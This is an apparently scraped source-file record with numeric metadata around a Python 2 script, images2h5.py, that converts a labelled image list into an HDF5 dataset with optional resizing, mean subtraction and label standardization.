37.290323
0.770227
0
0
0.363636
0
0
0.252377
0.217805
0
0
0
0
0
1
0.181818
false
0
0.181818
0.136364
0.590909
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
1
0
0
2
e73a9a856eec52409b4256399bd7134cda02fe56
3,116
py
Python
images2h5.py
prlz77/LSTM-on-CNN
c71ac68d8d1052a69531cb9b8f969ed04eba2205
[ "MIT" ]
11
2017-02-26T08:07:46.000Z
2022-03-01T06:22:09.000Z
images2h5.py
prlz77/LSTM-on-CNN
c71ac68d8d1052a69531cb9b8f969ed04eba2205
[ "MIT" ]
null
null
null
images2h5.py
prlz77/LSTM-on-CNN
c71ac68d8d1052a69531cb9b8f969ed04eba2205
[ "MIT" ]
4
2019-11-27T16:59:40.000Z
2021-12-06T21:21:07.000Z
# -*- coding: utf-8 -*- """ Generates the outputs of an arbitrary CNN layer. """ __author__ = "Pau Rodríguez López, ISELAB, CVC-UAB" __email__ = "pau.rodri1@gmail.com" import argparse import h5py import cv2 import os import numpy as np parser = argparse.ArgumentParser(description="Reads a list of images, labels and sequences and outputs it into an h5") parser.add_argument('flist', type=str, nargs=2, help="root path and file list with image<space>label<space>seq_num\n") parser.add_argument('--subtract_mean', action='store_true', help='standarize data') parser.add_argument('--output', type=str, help='output filename') parser.add_argument('--size', type=int, default=0, help='resize images to size') parser.add_argument('--standarize', action='store_true', help='whether to standarize the labels (useful for regression)') parser.add_argument('--with_train', type=str, default='', help='standarize/mean test given the train.h5') args = parser.parse_args() print 'Reading flist' with open(args.flist[1], 'r') as infile: data = infile.readlines() if args.size == 0: sample = cv2.imread(os.path.join(args.flist[0], data[0].split(' ')[0])) args.size = sample.shape[0] # assuming square images resize = False else: resize = True out = h5py.File(args.output, 'w') train = None if os.path.exists(args.with_train): train = h5py.File(args.with_train, 'r') out.create_dataset('outputs', shape=(len(data), 3, args.size, args.size), dtype=float) out.create_dataset('labels', shape=(len(data), 1), dtype=float) out.create_dataset('seq_number', shape=(len(data), ), dtype='int32') if train is None: mean_im = np.zeros((3,1,1)) else: mean_im = train['mean'][...] print 'Reading and pre-processing images' for i,d in enumerate(data): dir, label, seq = d.replace('\n', '').split(' ') im = cv2.imread(os.path.join(args.flist[0], dir)) if resize: im = cv2.resize(im, dsize=(args.size, args.size), interpolation=cv2.INTER_CUBIC) im = im.transpose(2,0,1).astype('float') if args.subtract_mean and train is None: mean_im += im.mean(axis=(1,2))[:,None,None] elif train is not None: im -= mean_im out['outputs'][i,...] = im out['labels'][i,0] = float(label) out['seq_number'][i] = int(seq) if i % 100 == 0: print 100*i/float(len(data)), '%' print '100 %' if args.subtract_mean and train is None: mean_im /= len(data) for i in xrange(len(data)): out['outputs'][i,...] -= mean_im out['mean'] = mean_im if train is not None: label_mean = train['label_mean'].value label_std = train['label_std'].value out['label_mean'] = label_mean out['label_std'] = label_std out['labels'][:] -= label_mean out['labels'][:] /= label_std elif args.standarize: out['label_mean'] = out['labels'][:].mean() out['label_std'] = out['labels'][:].std() out['labels'][:] = out['labels'][:] - out['label_mean'] out['labels'][:] = out['labels'][:] / out['label_std'] else: out['label_mean'] = 0. out['label_std'] = 1. out.close() if train is not None: train.close() print 'Done'
33.505376
121
0.656611
476
3,116
4.186975
0.294118
0.040642
0.051179
0.022579
0.156548
0.093327
0.067235
0.067235
0.038133
0.038133
0
0.017598
0.161104
3,116
93
122
33.505376
0.744836
0.014121
0
0.092105
1
0
0.2286
0.010949
0
0
0
0
0
0
null
null
0
0.065789
null
null
0.065789
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2